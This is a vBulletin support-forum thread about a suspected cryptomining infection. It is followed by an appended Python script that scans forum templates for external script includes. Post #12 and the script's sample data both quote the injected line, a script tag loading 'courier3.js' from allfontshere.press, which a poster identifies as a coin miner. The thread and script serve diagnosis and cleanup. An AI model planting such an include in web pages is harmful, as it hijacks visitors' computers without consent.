VB 4.2.3 infected by cryptomining malware

  • popup
    New Member
    • Sep 2012
    • 22

    VB 4.2.3 infected by cryptomining malware

    Hello,
    I've noticed that whenever I visit my VB 4.2.3 forum, I have high CPU load on my PC. The load drops as soon as I close the browser tab. So I guess some malware is running in the background.
    I have inactivated all plugins and ads but the problem persists.
    I tried to upgrade the forum to 4.2.5 but if failed to upgrade.

    Really appreciate your hints to troubleshoot/remove this problem.
  • Mark.B
    vBulletin Support
    • Feb 2004
    • 24287
    • 6.0.X

    #2
    That's rather a big assumption to make. You visit your forum, the CPU load goes up, so obviously it must be crypto mining software? What evidence do you have that this is the specific cause?

    Regardless of that, there are no known security exploits in 4.2.3, so if you HAVE been compromised, it's either through an add-on, or the server, or someone's obtained a password.

    What are the results of a suspect file check under diagnostics in the AdminCP?

    "Failed to upgrade" also doesn't tell us anything. We need full details of what you did, and what error messages were received. However, upgrading isn't a magic fix for hacked sites so this isn't really essential at this point.
    MARK.B
    vBulletin Support
    ------------
    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com


    • popup
      New Member
      • Sep 2012
      • 22

      #3
      I made that assumption lacking any other viable explanation, and considering that some ads I've used previously on the forum had caused the very same high CPU behavior on my other site (not a forum).

      It seems that my VB version is 4.2.2; please modify the thread's title.

      Diagnostics gives a lot of:
      File version mismatch: found 4.2.2 Patch Level 6, expected 4.2.2 Patch Level 4
      Which is because I tried to update the forum with clean code, hoping that that will get rid of the malware. But it did not.



      • Mark.B
        vBulletin Support
        • Feb 2004
        • 24287
        • 6.0.X

        #4
        Originally posted by popup
        I made that assumption lacking any other viable explanation, and considering that some ads I've used previously on the forum had caused the very same high CPU behavior on my other site (not a forum).

        It seems that my VB version is 4.2.2; please modify the thread's title.

        Diagnostics gives a lot of:
        File version mismatch: found 4.2.2 Patch Level 6, expected 4.2.2 Patch Level 4
        Which is because I tried to update the forum with clean code, hoping that that will get rid of the malware. But it did not.

        Ok, the first thing I would do is upgrade to 4.2.3 (no higher at this stage).

        BEGIN BY TAKING A FULL BACKUP OF THE DATABASE.

        Download a full copy of the 4.2.3 files from the members area, under 'Download vBulletin....' under the license options column on the right. It's important to obtain the full 4.2.3 package, not the patch release, and make sure it's for the correct license.

        Unzip and upload ALL the files, then run domain.com/install/upgrade.php.


        • popup
          New Member
          • Sep 2012
          • 22

          #5
          I tried to upgrade to 4.2.3 but the upgrade froze at 26%.

          However, at the admincp now I see:

          (vBulletin 4.2.3 Patch Level 2)

          So not sure whether the upgrade was successful.

          At any rate, I still have that nasty high cpu load while the plugins are disabled.

          It happens only when I open the forum, not the admin panel.

          What do you suggest Mark as the next step?
          Last edited by popup; Sat 31 Mar '18, 11:20am.


          • Mark.B
            vBulletin Support
            • Feb 2004
            • 24287
            • 6.0.X

            #6
            You need to complete the upgrade. If the page has stalled, refresh the page and it should carry on.


            • popup
              New Member
              • Sep 2012
              • 22

              #7
              I managed to upgrade to 4.2.5 Beta 1 after a lot of refreshing, while at several steps I had to set merge templates to 'No' in order to make the upgrade proceed. It hung at step 7 of 17 to reach 4.2.5, however.

              I still have that high CPU load. Where should I look for the nefarious code/script?
              Last edited by popup; Sat 31 Mar '18, 6:07pm.


              • Mark.B
                vBulletin Support
                • Feb 2004
                • 24287
                • 6.0.X

                #8
                I did say to upgrade to 4.2.3 and no higher at this stage. Why have you attempted to upgrade to 4.2.5?

                It is important to follow our instructions closely and precisely. If you don't do this, we cannot help.

                If it is stuck at step 17 your upgrade is NOT complete and your site will be broken. No upgrade is complete until you get the completed message at the end.

                What php version are you running on the server?


                • popup
                  New Member
                  • Sep 2012
                  • 22

                  #9
                  I have successfully upgraded to 4.2.3. But I still get that high CPU load.
                  My PHP version is 5.6.30.
                  What can I do now?
                  Also, I'm wondering: if it is not cryptomining malware, what else can cause such a high CPU spike on a vBulletin site?
                  Last edited by popup; Sun 1 Apr '18, 3:45am.


                  • Trevor Hannant
                    vBulletin Support
                    • Aug 2002
                    • 24349
                    • 5.7.X

                    #10
                    Are you the only person who's having high PC CPU load when visiting your site or are other users experiencing this?
                    Vote for:

                    - Admin Settable Paid Subscription Reminder Timeframe (vB6)
                    - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)


                    • Jamsoft
                      Member
                      • Jun 2011
                      • 71

                      #11
                      I have the same thing happening on a customer's site. I've recommended they upgrade (or allow me to upgrade) to the latest 4.2.5 (they're on 4.2.0) and am awaiting their response. Their users are swearing up and down it's the courier3.js file as well as the yui files. When I go to the site, my CPU starts spiking high, and if I sit in developer tools, I see tons of images keep being loaded every so often that are not showing up on the page. So something is up, but I haven't yet seen something solid as far as what's causing it.


                      • Jamsoft
                        Member
                        • Jun 2011
                        • 71

                        #12
                        Ok, check this out:

                        <!-- Fonts Script -->
                        <!-- script async="async" src="http://allfontshere.press/fonts/courier3.js"></script -->
                        <!-- End Fonts Script -->
                        This script was loaded at the top of the customer's template. At first glance, it looked fine, but it was definitely causing the loads we were seeing. See if you have something similar.

                        Trevor, does the above look familiar at all?


                        • In Omnibus
                          Senior Member
                          • Apr 2010
                          • 2310

                          #13
                          Originally posted by Jamsoft
                          Ok, check this out:

                          This script was loaded at the top of the customer's template. At first glance, it looked fine, but it was definitely causing the loads we were seeing. See if you have something similar.

                          Trevor, does the above look familiar at all?
                          That is definitely a coin miner.


                          • Jamsoft
                            Member
                            • Jun 2011
                            • 71

                            #14
                            Nice. Well, it's disabled. It's not my site, so I'm not sure how it got there. I still think they should let me upgrade the site, and maybe add some security to the admincp.


                            • Dreslough
                              New Member
                              • Aug 2006
                              • 4
                              • 3.6.x

                              #15
                              We're running 4.2.4 and I just discovered the same problem. I even opened up my CPU, assuming I was dealing with a hardware problem after all the Windows diagnostics came back normal. Then I realized that I had a tab open to our company's forum (http://mogulforums.com/) in Chrome. And even after a reboot, Chrome was nice enough to re-open all my tabs. (D'oh!). Then I closed the vBulletin tab and my computer started working normally again (and the CPU usage dropped from 97-99% down to 2-3%).

                              I'm a vBulletin newbie so I'm still infected. But at least I'm partway to discovering and fixing. I have no plug-ins installed. Could someone please lead me through the steps to find and remove the offending code? (e.g. exactly what do I click on the Admin CP menu etc.)

                              For example, I don't even know how to search customer templates.

                              Thanks!

                              Clay
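An added example, not code from this thread or from vBulletin, for the check Jamsoft describes in #12 and the template search Clay asks for in #15: given the HTML of templates such as headinclude and footer (copied out of the AdminCP style editor or exported from the template table), it lists every script loaded from a host outside an allowlist, and also reports includes hidden inside HTML comments, since a "disabled" injection like the commented-out courier3.js line is still evidence of a compromise. The allowlist hosts and the second external URL are assumptions; the courier3.js line is the one quoted in this thread.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately serves scripts from; adjust per site.
ALLOWED_HOSTS = {"mogulforums.com", "www.mogulforums.com"}

class _LiveScripts(HTMLParser):
    """Collect src= of real (uncommented) <script> tags."""
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.srcs += [v for k, v in attrs if k == "src" and v]

def _commented_srcs(html):
    """src= values inside <!-- ... -->: a 'disabled' injection is still evidence."""
    srcs = []
    for body in re.findall(r"<!--(.*?)-->", html, flags=re.S):
        srcs += re.findall(r"""src\s*=\s*["']([^"']+)["']""", body, flags=re.I)
    return srcs

def audit_templates(templates, allowed_hosts=ALLOWED_HOSTS):
    """Return (template, src, 'active'|'commented') for every script whose host
    is not allowlisted; relative paths (host None) are treated as local."""
    findings = []
    for name, html in templates.items():
        p = _LiveScripts()
        p.feed(html)
        tagged = [(s, "active") for s in p.srcs]
        tagged += [(s, "commented") for s in _commented_srcs(html)]
        for src, state in tagged:
            host = urlparse(src).hostname
            if host and host.lower() not in allowed_hosts:
                findings.append((name, src, state))
    return findings

# Constructed sample (vBulletin 4-style headinclude/footer): one local YUI include,
# the commented-out include quoted in this thread, one constructed external include.
SAMPLE_TEMPLATES = {
    "headinclude": (
        '<!-- Fonts Script -->\n'
        '<!-- script async="async" src="http://allfontshere.press/fonts/courier3.js"></script -->\n'
        '<!-- End Fonts Script -->\n'
        '<script type="text/javascript" src="clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js?v=423"></script>\n'
        '<script type="text/javascript" src="//scripts.example.com/loader.js"></script>\n'
    ),
    "footer": '<script type="text/javascript" src="http://www.mogulforums.com/clientscript/vbulletin-core.js?v=423"></script>\n',
}
```

Running `audit_templates(SAMPLE_TEMPLATES)` reports the active scripts.example.com include and the commented-out allfontshere.press include, and nothing for the local YUI or vbulletin-core scripts.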
